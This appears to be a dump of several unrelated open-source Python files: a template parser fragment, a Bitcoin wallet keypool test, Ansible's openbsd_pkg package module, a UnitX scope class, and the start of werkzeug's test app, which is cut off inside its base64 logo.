if chunk.new_var in arguments:
original_value = arguments[chunk.new_var]
assert isinstance(iterable, list)
for value in iterable:
arguments[chunk.new_var] = value
rendered += render_ast(chunk.body)
# Reset the argument to the original state.
if isinstance(original_value, UnsetMarker):
del arguments[chunk.new_var]
else:
arguments[chunk.new_var] = original_value
elif isinstance(chunk, str):
rendered += chunk
else:
raise NotImplementedError(
"Unknown chunk type {}".format(type(chunk)))
return rendered
return render_ast(self.ast)
def target_from_ast(self):
def variables_from_ast(ast, blacklist):
target = gen.internals.Target()
for chunk in ast:
if isinstance(chunk, Switch):
scope = gen.internals.Scope(chunk.identifier)
for value, sub_ast in chunk.cases.items():
scope.add_case(value, variables_from_ast(sub_ast, blacklist))
target.add_scope(scope)
elif isinstance(chunk, Replacement):
if chunk.identifier not in blacklist:
target.add_variable(chunk.identifier)
elif isinstance(chunk, For):
target += variables_from_ast(chunk.body, blacklist | {chunk.new_var})
elif isinstance(chunk, str):
continue
else:
raise NotImplementedError(
"Unknown chunk type {}".format(type(chunk)))
return target
return variables_from_ast(self.ast, set())
def get_filters(self):
def filters_from_ast(ast):
filters = set()
for chunk in ast:
if isinstance(chunk, Switch):
for case in chunk.cases.values():
filters |= filters_from_ast(case)
elif isinstance(chunk, Replacement):
filters.add(chunk.filter)
elif isinstance(chunk, For):
filters |= filters_from_ast(chunk.body)
elif isinstance(chunk, str):
continue
else:
raise NotImplementedError(
"Unknown chunk type {}".format(type(chunk)))
return filters
filters = filters_from_ast(self.ast)
filters.discard(None)
return filters
def __repr__(self):
return "<template {}>".format(self.ast)
def __eq__(self, other):
return isinstance(other, Template) and self.ast == other.ast
def _parse_for(tokenizer):
token_type, value = tokenizer.peek()
assert token_type == 'for'
new_var, iterable = value
tokenizer.advance()
# Read out the body
body = _parse_chunks(tokenizer)
# Should stop reading the body at the endfor
token_type, value = tokenizer.peek()
if token_type != 'endfor':
raise ValueError("Expecting end of for, but found {}.".format(token_type))
tokenizer.advance()
return For(new_var, iterable, body)
def _parse_switch(tokenizer):
token_type, identifier = tokenizer.peek()
assert(token_type == 'switch')
cases = dict()
is_first = True
# Immediately inside should be a case, followed by lots more of those
tokenizer.advance()
while(True):
token_type, value = tokenizer.peek()
if token_type == 'case':
tokenizer.advance()
cases[value] = _parse_chunks(tokenizer)
elif token_type == 'endswitch':
tokenizer.advance()
return Switch(identifier, cases)
elif token_type == 'blob':
# Only reachable before the first case; otherwise the blob is consumed inside a case.
assert is_first
if not value.isspace():
raise ValueError("Unexpected blob of text outside of switch case statements. Whitespace is all that is allowed.") # noqa
tokenizer.advance()
else:
raise ValueError(
"Unexpected token of type {} inside switch. Expected a case or endswitch.".format(token_type))
is_first = False
raise RuntimeError("Unexpectedly exited the while loop in _parse_switch")
def _parse_chunks(tokenizer):
# Read Chunks
chunks = []
while True:
token_type, value = tokenizer.peek()
if token_type == 'blob':
chunks.append(value)
tokenizer.advance()
elif token_type == 'replacement':
chunks.append(Replacement(value))
tokenizer.advance()
elif token_type == 'switch':
chunks.append(_parse_switch(tokenizer))
elif token_type == 'for':
chunks.append(_parse_for(tokenizer))
else:
return chunks
def parse_str(text):
tokenizer = Tokenizer(text)
ast = _parse_chunks(tokenizer)
token_type, _ = tokenizer.peek()
if token_type != "eof":
raise ValueError(
"Unexpected token of type {} at end of text, expecting EOF".format(token_type))
return Template(ast)
def parse_resources(filename):
try:
return parse_str(resource_string(__name__, filename).decode())
except SyntaxError as ex:
# Don't accidentally overwrite a previously set filename. Shouldn't
# happen since no code this calls sets ex.filename.
assert not ex.filename
raise SyntaxError(ex.message, filename) from ex
|
jlazic/GlogSMS
|
refs/heads/master
|
sms/management/__init__.py
|
1
|
__author__ = 'josip@lazic.info'
|
Bushstar/UFO-Project
|
refs/heads/master-0.17
|
test/functional/wallet_keypool.py
|
2
|
#!/usr/bin/env python3
# Copyright (c) 2014-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the wallet keypool and interaction with wallet encryption/locking."""
import time
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal, assert_raises_rpc_error
class KeyPoolTest(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 1
def run_test(self):
nodes = self.nodes
addr_before_encrypting = nodes[0].getnewaddress()
addr_before_encrypting_data = nodes[0].getaddressinfo(addr_before_encrypting)
wallet_info_old = nodes[0].getwalletinfo()
assert_equal(wallet_info_old['hdseedid'], wallet_info_old['hdmasterkeyid'])
assert(addr_before_encrypting_data['hdseedid'] == wallet_info_old['hdseedid'])
# Encrypt wallet and wait to terminate
nodes[0].node_encrypt_wallet('test')
# Restart node 0
self.start_node(0)
# Keep creating keys
addr = nodes[0].getnewaddress()
addr_data = nodes[0].getaddressinfo(addr)
wallet_info = nodes[0].getwalletinfo()
assert_equal(wallet_info['hdseedid'], wallet_info['hdmasterkeyid'])
assert(addr_before_encrypting_data['hdseedid'] != wallet_info['hdseedid'])
assert(addr_data['hdseedid'] == wallet_info['hdseedid'])
assert_raises_rpc_error(-12, "Error: Keypool ran out, please call keypoolrefill first", nodes[0].getnewaddress)
# put six (plus 2) new keys in the keypool (100% external-, +100% internal-keys, 1 in min)
nodes[0].walletpassphrase('test', 12000)
nodes[0].keypoolrefill(6)
nodes[0].walletlock()
wi = nodes[0].getwalletinfo()
assert_equal(wi['keypoolsize_hd_internal'], 6)
assert_equal(wi['keypoolsize'], 6)
# drain the internal keys
nodes[0].getrawchangeaddress()
nodes[0].getrawchangeaddress()
nodes[0].getrawchangeaddress()
nodes[0].getrawchangeaddress()
nodes[0].getrawchangeaddress()
nodes[0].getrawchangeaddress()
addr = set()
# the next one should fail
assert_raises_rpc_error(-12, "Keypool ran out", nodes[0].getrawchangeaddress)
# drain the external keys
addr.add(nodes[0].getnewaddress())
addr.add(nodes[0].getnewaddress())
addr.add(nodes[0].getnewaddress())
addr.add(nodes[0].getnewaddress())
addr.add(nodes[0].getnewaddress())
addr.add(nodes[0].getnewaddress())
assert(len(addr) == 6)
# the next one should fail
assert_raises_rpc_error(-12, "Error: Keypool ran out, please call keypoolrefill first", nodes[0].getnewaddress)
# refill keypool with three new addresses
nodes[0].walletpassphrase('test', 1)
nodes[0].keypoolrefill(3)
# test walletpassphrase timeout
time.sleep(1.1)
assert_equal(nodes[0].getwalletinfo()["unlocked_until"], 0)
# drain them by mining
nodes[0].generate(1)
nodes[0].generate(1)
nodes[0].generate(1)
assert_raises_rpc_error(-12, "Keypool ran out", nodes[0].generate, 1)
nodes[0].walletpassphrase('test', 100)
nodes[0].keypoolrefill(100)
wi = nodes[0].getwalletinfo()
assert_equal(wi['keypoolsize_hd_internal'], 100)
assert_equal(wi['keypoolsize'], 100)
if __name__ == '__main__':
KeyPoolTest().main()
|
toshywoshy/ansible
|
refs/heads/devel
|
lib/ansible/modules/packaging/os/openbsd_pkg.py
|
79
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2013, Patrik Lundin <patrik@sigterm.se>
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: openbsd_pkg
author:
- Patrik Lundin (@eest)
version_added: "1.1"
short_description: Manage packages on OpenBSD
description:
- Manage packages on OpenBSD using the pkg tools.
requirements:
- python >= 2.5
options:
name:
description:
- A name or a list of names of the packages.
required: yes
state:
description:
- C(present) will make sure the package is installed.
C(latest) will make sure the latest version of the package is installed.
C(absent) will make sure the specified package is not installed.
choices: [ absent, latest, present ]
default: present
build:
description:
- Build the package from source instead of downloading and installing
a binary. Requires that the port source tree is already installed.
Automatically builds and installs the 'sqlports' package, if it is
not already installed.
type: bool
default: 'no'
version_added: "2.1"
ports_dir:
description:
- When used in combination with the C(build) option, allows overriding
the default ports source directory.
default: /usr/ports
version_added: "2.1"
clean:
description:
- When updating or removing packages, delete the extra configuration
file(s) in the old packages which are annotated with @extra in
the packaging-list.
type: bool
default: 'no'
version_added: "2.3"
quick:
description:
- Replace or delete packages quickly; do not bother with checksums
before removing normal files.
type: bool
default: 'no'
version_added: "2.3"
notes:
- When used with a `loop:` each package will be processed individually;
it is much more efficient to pass the list directly to the `name` option.
'''
EXAMPLES = '''
- name: Make sure nmap is installed
openbsd_pkg:
name: nmap
state: present
- name: Make sure nmap is the latest version
openbsd_pkg:
name: nmap
state: latest
- name: Make sure nmap is not installed
openbsd_pkg:
name: nmap
state: absent
- name: Make sure nmap is installed, build it from source if it is not
openbsd_pkg:
name: nmap
state: present
build: yes
- name: Specify a pkg flavour with '--'
openbsd_pkg:
name: vim--no_x11
state: present
- name: Specify the default flavour to avoid ambiguity errors
openbsd_pkg:
name: vim--
state: present
- name: Specify a package branch (requires at least OpenBSD 6.0)
openbsd_pkg:
name: python%3.5
state: present
- name: Update all packages on the system
openbsd_pkg:
name: '*'
state: latest
- name: Purge a package and its configuration files
openbsd_pkg:
name: mpd
clean: yes
state: absent
- name: Quickly remove a package without checking checksums
openbsd_pkg:
name: qt5
quick: yes
state: absent
'''
import os
import platform
import re
import shlex
import sqlite3
from distutils.version import StrictVersion
from ansible.module_utils.basic import AnsibleModule
# Function used for executing commands.
def execute_command(cmd, module):
# Break command line into arguments.
# This makes run_command() use shell=False which we need to not cause shell
# expansion of special characters like '*'.
cmd_args = shlex.split(cmd)
return module.run_command(cmd_args)
# Function used to find out if a package is currently installed.
def get_package_state(names, pkg_spec, module):
info_cmd = 'pkg_info -Iq'
for name in names:
command = "%s inst:%s" % (info_cmd, name)
rc, stdout, stderr = execute_command(command, module)
if stderr:
module.fail_json(msg="failed in get_package_state(): " + stderr)
if stdout:
# If the requested package name is just a stem, like "python", we may
# find multiple packages with that name.
pkg_spec[name]['installed_names'] = stdout.splitlines()
module.debug("get_package_state(): installed_names = %s" % pkg_spec[name]['installed_names'])
pkg_spec[name]['installed_state'] = True
else:
pkg_spec[name]['installed_state'] = False
# Function used to make sure a package is present.
def package_present(names, pkg_spec, module):
build = module.params['build']
for name in names:
# It is possible package_present() has been called from package_latest().
# In that case we do not want to operate on the whole list of names,
# only the leftovers.
if pkg_spec['package_latest_leftovers']:
if name not in pkg_spec['package_latest_leftovers']:
module.debug("package_present(): ignoring '%s' which is not a package_latest() leftover" % name)
continue
else:
module.debug("package_present(): handling package_latest() leftovers, installing '%s'" % name)
if module.check_mode:
install_cmd = 'pkg_add -Imn'
else:
if build is True:
port_dir = "%s/%s" % (module.params['ports_dir'], get_package_source_path(name, pkg_spec, module))
if os.path.isdir(port_dir):
if pkg_spec[name]['flavor']:
flavors = pkg_spec[name]['flavor'].replace('-', ' ')
install_cmd = "cd %s && make clean=depends && FLAVOR=\"%s\" make install && make clean=depends" % (port_dir, flavors)
elif pkg_spec[name]['subpackage']:
install_cmd = "cd %s && make clean=depends && SUBPACKAGE=\"%s\" make install && make clean=depends" % (port_dir,
pkg_spec[name]['subpackage'])
else:
install_cmd = "cd %s && make install && make clean=depends" % (port_dir)
else:
module.fail_json(msg="the port source directory %s does not exist" % (port_dir))
else:
install_cmd = 'pkg_add -Im'
if pkg_spec[name]['installed_state'] is False:
# Attempt to install the package
if build is True and not module.check_mode:
(pkg_spec[name]['rc'], pkg_spec[name]['stdout'], pkg_spec[name]['stderr']) = module.run_command(install_cmd, module, use_unsafe_shell=True)
else:
(pkg_spec[name]['rc'], pkg_spec[name]['stdout'], pkg_spec[name]['stderr']) = execute_command("%s %s" % (install_cmd, name), module)
# The behaviour of pkg_add is a bit different depending on if a
# specific version is supplied or not.
#
# When a specific version is supplied the return code will be 0 when
# a package is found and 1 when it is not. If a version is not
# supplied the tool will exit 0 in both cases.
#
# It is important to note that "version" relates to the
# packages-specs(7) notion of a version. If using the branch syntax
# (like "python%3.5") even though a branch name may look like a
# version string it is not used as one by pkg_add.
if pkg_spec[name]['version'] or build is True:
# Depend on the return code.
module.debug("package_present(): depending on return code for name '%s'" % name)
if pkg_spec[name]['rc']:
pkg_spec[name]['changed'] = False
else:
# Depend on stderr instead.
module.debug("package_present(): depending on stderr for name '%s'" % name)
if pkg_spec[name]['stderr']:
# There is a corner case where having an empty directory in
# installpath prior to the right location will result in a
# "file:/local/package/directory/ is empty" message on stderr
# while still installing the package, so we need to look
# for a message like "packagename-1.0: ok" just in case.
match = re.search(r"\W%s-[^:]+: ok\W" % pkg_spec[name]['stem'], pkg_spec[name]['stdout'])
if match:
# It turns out we were able to install the package.
module.debug("package_present(): we were able to install package for name '%s'" % name)
else:
# We really did fail, fake the return code.
module.debug("package_present(): we really did fail for name '%s'" % name)
pkg_spec[name]['rc'] = 1
pkg_spec[name]['changed'] = False
else:
module.debug("package_present(): stderr was not set for name '%s'" % name)
if pkg_spec[name]['rc'] == 0:
pkg_spec[name]['changed'] = True
else:
pkg_spec[name]['rc'] = 0
pkg_spec[name]['stdout'] = ''
pkg_spec[name]['stderr'] = ''
pkg_spec[name]['changed'] = False
# Function used to make sure a package is the latest available version.
def package_latest(names, pkg_spec, module):
if module.params['build'] is True:
module.fail_json(msg="the combination of build=%s and state=latest is not supported" % module.params['build'])
upgrade_cmd = 'pkg_add -um'
if module.check_mode:
upgrade_cmd += 'n'
if module.params['clean']:
upgrade_cmd += 'c'
if module.params['quick']:
upgrade_cmd += 'q'
for name in names:
if pkg_spec[name]['installed_state'] is True:
# Attempt to upgrade the package.
(pkg_spec[name]['rc'], pkg_spec[name]['stdout'], pkg_spec[name]['stderr']) = execute_command("%s %s" % (upgrade_cmd, name), module)
# Look for output looking something like "nmap-6.01->6.25: ok" to see if
# something changed (or would have changed). Use \W to delimit the match
# from progress meter output.
pkg_spec[name]['changed'] = False
for installed_name in pkg_spec[name]['installed_names']:
module.debug("package_latest(): checking for pre-upgrade package name: %s" % installed_name)
match = re.search(r"\W%s->.+: ok\W" % installed_name, pkg_spec[name]['stdout'])
if match:
module.debug("package_latest(): pre-upgrade package name match: %s" % installed_name)
pkg_spec[name]['changed'] = True
break
# FIXME: This part is problematic. Based on the issues mentioned (and
# handled) in package_present() it is not safe to blindly trust stderr
# as an indicator that the command failed, and in the case with
# empty installpath directories this will break.
#
# For now keep this safeguard here, but ignore it if we managed to
# parse out a successful update above. This way we will report a
# successful run when we actually modify something but fail
# otherwise.
if pkg_spec[name]['changed'] is not True:
if pkg_spec[name]['stderr']:
pkg_spec[name]['rc'] = 1
else:
# Note packages that need to be handled by package_present
module.debug("package_latest(): package '%s' is not installed, will be handled by package_present()" % name)
pkg_spec['package_latest_leftovers'].append(name)
# If there were any packages that were not installed we call
# package_present() which will handle those.
if pkg_spec['package_latest_leftovers']:
module.debug("package_latest(): calling package_present() to handle leftovers")
package_present(names, pkg_spec, module)
# Function used to make sure a package is not installed.
def package_absent(names, pkg_spec, module):
remove_cmd = 'pkg_delete -I'
if module.check_mode:
remove_cmd += 'n'
if module.params['clean']:
remove_cmd += 'c'
if module.params['quick']:
remove_cmd += 'q'
for name in names:
if pkg_spec[name]['installed_state'] is True:
# Attempt to remove the package.
(pkg_spec[name]['rc'], pkg_spec[name]['stdout'], pkg_spec[name]['stderr']) = execute_command("%s %s" % (remove_cmd, name), module)
if pkg_spec[name]['rc'] == 0:
pkg_spec[name]['changed'] = True
else:
pkg_spec[name]['changed'] = False
else:
pkg_spec[name]['rc'] = 0
pkg_spec[name]['stdout'] = ''
pkg_spec[name]['stderr'] = ''
pkg_spec[name]['changed'] = False
# Function used to parse the package name based on packages-specs(7).
# The general name structure is "stem-version[-flavors]".
#
# Names containing "%" are a special variation not part of the
# packages-specs(7) syntax. See pkg_add(1) on OpenBSD 6.0 or later for a
# description.
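# A few illustrative names and how the regexes below split them (the names are
# examples only):
#   "nmap-6.25"   -> stem "nmap", version "6.25" (style "version")
#   "vim--no_x11" -> stem "vim", version None, flavor "no_x11" (style "versionless")
#   "python%3.5"  -> stem "python", branch "3.5" (style "stem")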
def parse_package_name(names, pkg_spec, module):
# Initialize empty list of package_latest() leftovers.
pkg_spec['package_latest_leftovers'] = []
for name in names:
module.debug("parse_package_name(): parsing name: %s" % name)
# Do some initial matches so we can base the more advanced regex on that.
version_match = re.search("-[0-9]", name)
versionless_match = re.search("--", name)
# Stop if someone is giving us a name that both has a version and is
# version-less at the same time.
if version_match and versionless_match:
module.fail_json(msg="package name both has a version and is version-less: " + name)
# All information for a given name is kept in the pkg_spec keyed by that name.
pkg_spec[name] = {}
# If name includes a version.
if version_match:
match = re.search("^(?P<stem>[^%]+)-(?P<version>[0-9][^-]*)(?P<flavor_separator>-)?(?P<flavor>[a-z].*)?(%(?P<branch>.+))?$", name)
if match:
pkg_spec[name]['stem'] = match.group('stem')
pkg_spec[name]['version_separator'] = '-'
pkg_spec[name]['version'] = match.group('version')
pkg_spec[name]['flavor_separator'] = match.group('flavor_separator')
pkg_spec[name]['flavor'] = match.group('flavor')
pkg_spec[name]['branch'] = match.group('branch')
pkg_spec[name]['style'] = 'version'
module.debug("version_match: stem: %(stem)s, version: %(version)s, flavor_separator: %(flavor_separator)s, "
"flavor: %(flavor)s, branch: %(branch)s, style: %(style)s" % pkg_spec[name])
else:
module.fail_json(msg="unable to parse package name at version_match: " + name)
# If name includes no version but is version-less ("--").
elif versionless_match:
match = re.search("^(?P<stem>[^%]+)--(?P<flavor>[a-z].*)?(%(?P<branch>.+))?$", name)
if match:
pkg_spec[name]['stem'] = match.group('stem')
pkg_spec[name]['version_separator'] = '-'
pkg_spec[name]['version'] = None
pkg_spec[name]['flavor_separator'] = '-'
pkg_spec[name]['flavor'] = match.group('flavor')
pkg_spec[name]['branch'] = match.group('branch')
pkg_spec[name]['style'] = 'versionless'
module.debug("versionless_match: stem: %(stem)s, flavor: %(flavor)s, branch: %(branch)s, style: %(style)s" % pkg_spec[name])
else:
module.fail_json(msg="unable to parse package name at versionless_match: " + name)
# If name includes no version, and is not version-less, it is all a
# stem, possibly with a branch (%branchname) tacked on at the
# end.
else:
match = re.search("^(?P<stem>[^%]+)(%(?P<branch>.+))?$", name)
if match:
pkg_spec[name]['stem'] = match.group('stem')
pkg_spec[name]['version_separator'] = None
pkg_spec[name]['version'] = None
pkg_spec[name]['flavor_separator'] = None
pkg_spec[name]['flavor'] = None
pkg_spec[name]['branch'] = match.group('branch')
pkg_spec[name]['style'] = 'stem'
module.debug("stem_match: stem: %(stem)s, branch: %(branch)s, style: %(style)s" % pkg_spec[name])
else:
module.fail_json(msg="unable to parse package name at else: " + name)
# Verify that the managed host is new enough to support branch syntax.
if pkg_spec[name]['branch']:
branch_release = "6.0"
if StrictVersion(platform.release()) < StrictVersion(branch_release):
module.fail_json(msg="package name using 'branch' syntax requires at least OpenBSD %s: %s" % (branch_release, name))
# Sanity check that there are no trailing dashes in flavor.
# Try to stop strange stuff early so we can be strict later.
if pkg_spec[name]['flavor']:
match = re.search("-$", pkg_spec[name]['flavor'])
if match:
module.fail_json(msg="trailing dash in flavor: " + pkg_spec[name]['flavor'])
# Function used for figuring out the port path.
def get_package_source_path(name, pkg_spec, module):
pkg_spec[name]['subpackage'] = None
if pkg_spec[name]['stem'] == 'sqlports':
return 'databases/sqlports'
else:
# try for an exact match first
sqlports_db_file = '/usr/local/share/sqlports'
if not os.path.isfile(sqlports_db_file):
module.fail_json(msg="sqlports file '%s' is missing" % sqlports_db_file)
conn = sqlite3.connect(sqlports_db_file)
first_part_of_query = 'SELECT fullpkgpath, fullpkgname FROM ports WHERE fullpkgname'
query = first_part_of_query + ' = ?'
module.debug("package_package_source_path(): exact query: %s" % query)
cursor = conn.execute(query, (name,))
results = cursor.fetchall()
# next, try for a fuzzier match
if len(results) < 1:
looking_for = pkg_spec[name]['stem'] + (pkg_spec[name]['version_separator'] or '-') + (pkg_spec[name]['version'] or '%')
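            # The LIKE pattern is e.g. "vim-%" for a bare stem, or
            # "vim-8.0.0987" when a version was given (illustrative names).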
query = first_part_of_query + ' LIKE ?'
if pkg_spec[name]['flavor']:
looking_for += pkg_spec[name]['flavor_separator'] + pkg_spec[name]['flavor']
module.debug("package_package_source_path(): fuzzy flavor query: %s" % query)
cursor = conn.execute(query, (looking_for,))
elif pkg_spec[name]['style'] == 'versionless':
query += ' AND fullpkgname NOT LIKE ?'
module.debug("package_package_source_path(): fuzzy versionless query: %s" % query)
cursor = conn.execute(query, (looking_for, "%s-%%" % looking_for,))
else:
module.debug("package_package_source_path(): fuzzy query: %s" % query)
cursor = conn.execute(query, (looking_for,))
results = cursor.fetchall()
# error if we don't find exactly 1 match
conn.close()
if len(results) < 1:
module.fail_json(msg="could not find a port by the name '%s'" % name)
if len(results) > 1:
matches = map(lambda x: x[1], results)
module.fail_json(msg="too many matches, unsure which to build: %s" % ' OR '.join(matches))
# there's exactly 1 match, so figure out the subpackage, if any, then return
fullpkgpath = results[0][0]
parts = fullpkgpath.split(',')
if len(parts) > 1 and parts[1][0] == '-':
pkg_spec[name]['subpackage'] = parts[1]
return parts[0]
# Function used for upgrading all installed packages.
def upgrade_packages(pkg_spec, module):
if module.check_mode:
upgrade_cmd = 'pkg_add -Imnu'
else:
upgrade_cmd = 'pkg_add -Imu'
# Create a minimal pkg_spec entry for '*' to store return values.
pkg_spec['*'] = {}
# Attempt to upgrade all packages.
pkg_spec['*']['rc'], pkg_spec['*']['stdout'], pkg_spec['*']['stderr'] = execute_command("%s" % upgrade_cmd, module)
# Try to find any occurrence of a package changing version like:
# "bzip2-1.0.6->1.0.6p0: ok".
match = re.search(r"\W\w.+->.+: ok\W", pkg_spec['*']['stdout'])
if match:
pkg_spec['*']['changed'] = True
else:
pkg_spec['*']['changed'] = False
    # It seems we cannot trust the return value, so depend on the presence
    # of stderr to know if something failed.
if pkg_spec['*']['stderr']:
pkg_spec['*']['rc'] = 1
else:
pkg_spec['*']['rc'] = 0
# ===========================================
# Main control flow.
def main():
module = AnsibleModule(
argument_spec=dict(
name=dict(type='list', required=True),
state=dict(type='str', default='present', choices=['absent', 'installed', 'latest', 'present', 'removed']),
build=dict(type='bool', default=False),
ports_dir=dict(type='path', default='/usr/ports'),
quick=dict(type='bool', default=False),
clean=dict(type='bool', default=False),
),
supports_check_mode=True
)
name = module.params['name']
state = module.params['state']
build = module.params['build']
ports_dir = module.params['ports_dir']
rc = 0
stdout = ''
stderr = ''
result = {}
result['name'] = name
result['state'] = state
result['build'] = build
# The data structure used to keep track of package information.
pkg_spec = {}
if build is True:
if not os.path.isdir(ports_dir):
module.fail_json(msg="the ports source directory %s does not exist" % (ports_dir))
        # build sqlports if it's not installed yet
parse_package_name(['sqlports'], pkg_spec, module)
get_package_state(['sqlports'], pkg_spec, module)
if not pkg_spec['sqlports']['installed_state']:
module.debug("main(): installing 'sqlports' because build=%s" % module.params['build'])
package_present(['sqlports'], pkg_spec, module)
asterisk_name = False
for n in name:
if n == '*':
if len(name) != 1:
module.fail_json(msg="the package name '*' can not be mixed with other names")
asterisk_name = True
if asterisk_name:
if state != 'latest':
module.fail_json(msg="the package name '*' is only valid when using state=latest")
else:
# Perform an upgrade of all installed packages.
upgrade_packages(pkg_spec, module)
else:
# Parse package names and put results in the pkg_spec dictionary.
parse_package_name(name, pkg_spec, module)
# Not sure how the branch syntax is supposed to play together
# with build mode. Disable it for now.
for n in name:
if pkg_spec[n]['branch'] and module.params['build'] is True:
module.fail_json(msg="the combination of 'branch' syntax and build=%s is not supported: %s" % (module.params['build'], n))
# Get state for all package names.
get_package_state(name, pkg_spec, module)
# Perform requested action.
if state in ['installed', 'present']:
package_present(name, pkg_spec, module)
elif state in ['absent', 'removed']:
package_absent(name, pkg_spec, module)
elif state == 'latest':
package_latest(name, pkg_spec, module)
# The combined changed status for all requested packages. If anything
# is changed this is set to True.
combined_changed = False
# The combined failed status for all requested packages. If anything
# failed this is set to True.
combined_failed = False
# We combine all error messages in this comma separated string, for example:
# "msg": "Can't find nmapp\n, Can't find nmappp\n"
combined_error_message = ''
# Loop over all requested package names and check if anything failed or
# changed.
for n in name:
if pkg_spec[n]['rc'] != 0:
combined_failed = True
if pkg_spec[n]['stderr']:
if combined_error_message:
combined_error_message += ", %s" % pkg_spec[n]['stderr']
else:
combined_error_message = pkg_spec[n]['stderr']
else:
if combined_error_message:
combined_error_message += ", %s" % pkg_spec[n]['stdout']
else:
combined_error_message = pkg_spec[n]['stdout']
if pkg_spec[n]['changed'] is True:
combined_changed = True
    # If combined_error_message contains anything, at least some part of the
    # list of requested package names failed.
if combined_failed:
module.fail_json(msg=combined_error_message, **result)
result['changed'] = combined_changed
module.exit_json(**result)
if __name__ == '__main__':
main()
|
supertask/UnitX
|
refs/heads/master
|
src/scope.py
|
4
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import sys
from collegue import Collegue
from constants import Constants
class Scope(dict, Collegue):
"""A class saving instances of a UnitXObject class.
This class is created by a ScopeList class, when a block statement
appeared in a running point.
And, the running point can use instances of UnitXObject existing in this
class during this class is alive.
But this class is deleted by a ScopeList class, when a block statement
disappeared in a running point. And then, the running point cannot use instances
of UnitXObject existed in this class.
Attributes:
parent: An instance of a parent Scope of this class.
"""
def __init__(self, parent):
""" Inits attributes of a Scope class. """
self.parent = parent
def find_scope_of(self, varname):
"""Returns an instance of a Scope class indicating varname.
Returns An instance indicating varname, if it exists in this scope
or ancestral parent scopes.
Args:
varname: A string of a variable.
Returns:
An instance of a Scope class indicating varname.
"""
        if varname in self:
            return self
        if self.parent is None:
            return None  # Reached the outermost scope without a match.
        return self.parent.find_scope_of(varname)  # Search recursively.
    @classmethod
    def set_mediator(cls, mediator):
        """Sets a mediator for the Mediator pattern of GoF.
        Args:
            mediator: An instance of an EvalVisitor class that inherits
                from Mediator.
        """
        cls.mediator = mediator
def main():
"""Run an example for a Scope class."""
from unitx_object import UnitXObject
from unit import Unit
grandparent = Scope(None)
grandparent['x'] = UnitXObject(value=2, varname=None, unit=Unit())
grandparent['z'] = UnitXObject(value=4, varname=None, unit=Unit())
parent = Scope(grandparent)
parent['y'] = UnitXObject(value=3, varname=None, unit=Unit())
child = Scope(parent)
print 'A grandparent scope instance: ', grandparent
print 'A parent scope instance: ', parent
print 'A child scope instance: ', child
found_scope = child.find_scope_of('x')
print 'A value of a "x": ', found_scope['x']
found_scope = child.find_scope_of('y')
print 'A value of a "y": ', found_scope['y']
found_scope = child.find_scope_of('z')
print 'A value of a "z": ', found_scope['z']
print child.parent.parent
return Constants.EXIT_SUCCESS
if __name__ == '__main__':
sys.exit(main())
|
EmmanuelJohnson/ssquiz
|
refs/heads/master
|
flask/lib/python2.7/site-packages/werkzeug/testapp.py
|
294
|
# -*- coding: utf-8 -*-
"""
werkzeug.testapp
~~~~~~~~~~~~~~~~
Provide a small test application that can be used to test a WSGI server
and check it for WSGI compliance.
:copyright: (c) 2014 by the Werkzeug Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
import os
import sys
import werkzeug
from textwrap import wrap
from werkzeug.wrappers import BaseRequest as Request, BaseResponse as Response
from werkzeug.utils import escape
import base64
logo = Response(base64.b64decode(
'''R0lGODlhoACgAOMIAAEDACwpAEpCAGdgAJaKAM28AOnVAP3rAP/////////
//////////////////////yH5BAEKAAgALAAAAACgAKAAAAT+EMlJq704680R+F0ojmRpnuj0rWnrv
nB8rbRs33gu0bzu/0AObxgsGn3D5HHJbCUFyqZ0ukkSDlAidctNFg7gbI9LZlrBaHGtzAae0eloe25
7w9EDOX2fst/xenyCIn5/gFqDiVVDV4aGeYiKkhSFjnCQY5OTlZaXgZp8nJ2ekaB0SQOjqphrpnOiq
ncEn65UsLGytLVmQ6m4sQazpbtLqL/HwpnER8bHyLrLOc3Oz8PRONPU1crXN9na263dMt/g4SzjMeX
m5yDpLqgG7OzJ4u8lT/P69ej3JPn69kHzN2OIAHkB9RUYSFCFQYQJFTIkCDBiwoXWGnowaLEjRm7+G
p9A7Hhx4rUkAUaSLJlxHMqVMD/aSycSZkyTplCqtGnRAM5NQ1Ly5OmzZc6gO4d6DGAUKA+hSocWYAo
SlM6oUWX2O/o0KdaVU5vuSQLAa0ADwQgMEMB2AIECZhVSnTno6spgbtXmHcBUrQACcc2FrTrWS8wAf
78cMFBgwIBgbN+qvTt3ayikRBk7BoyGAGABAdYyfdzRQGV3l4coxrqQ84GpUBmrdR3xNIDUPAKDBSA
ADIGDhhqTZIWaDcrVX8EsbNzbkvCOxG8bN5w8ly9H8jyTJHC6DFndQydbguh2e/ctZJFXRxMAqqPVA
tQH5E64SPr1f0zz7sQYjAHg0In+JQ11+N2B0XXBeeYZgBZFx4tqBToiTCPv0YBgQv8JqA6BEf6RhXx
w1ENhRBnWV8ctEX4Ul2zc3aVGcQNC2KElyTDYyYUWvShdjDyMOGMuFjqnII45aogPhz/CodUHFwaDx
lTgsaOjNyhGWJQd+lFoAGk8ObghI0kawg+EV5blH3dr+digkYuAGSaQZFHFz2P/cTaLmhF52QeSb45
Jwxd+uSVGHlqOZpOeJpCFZ5J+rkAkFjQ0N1tah7JJSZUFNsrkeJUJMIBi8jyaEKIhKPomnC91Uo+NB
yyaJ5umnnpInIFh4t6ZSpGaAVmizqjpByDegYl8tPE0phCYrhcMWSv+uAqHfgH88ak5UXZmlKLVJhd
dj78s1Fxnzo6yUCrV6rrDOkluG+QzCAUTbCwf9SrmMLzK6p+OPHx7DF+bsfMRq7Ec61Av9i6GLw23r
idnZ+/OO0a99pbIrJkproCQMA17OPG6suq3cca5ruDfXCCDoS7BEdvmJn5otdqscn+uogRHHXs8cbh
EIfYaDY1AkrC0cqwcZpnM6ludx72x0p7Fo/hZAcpJDjax0UdHavMKAbiKltMWCF3xxh9k25N/Viud8
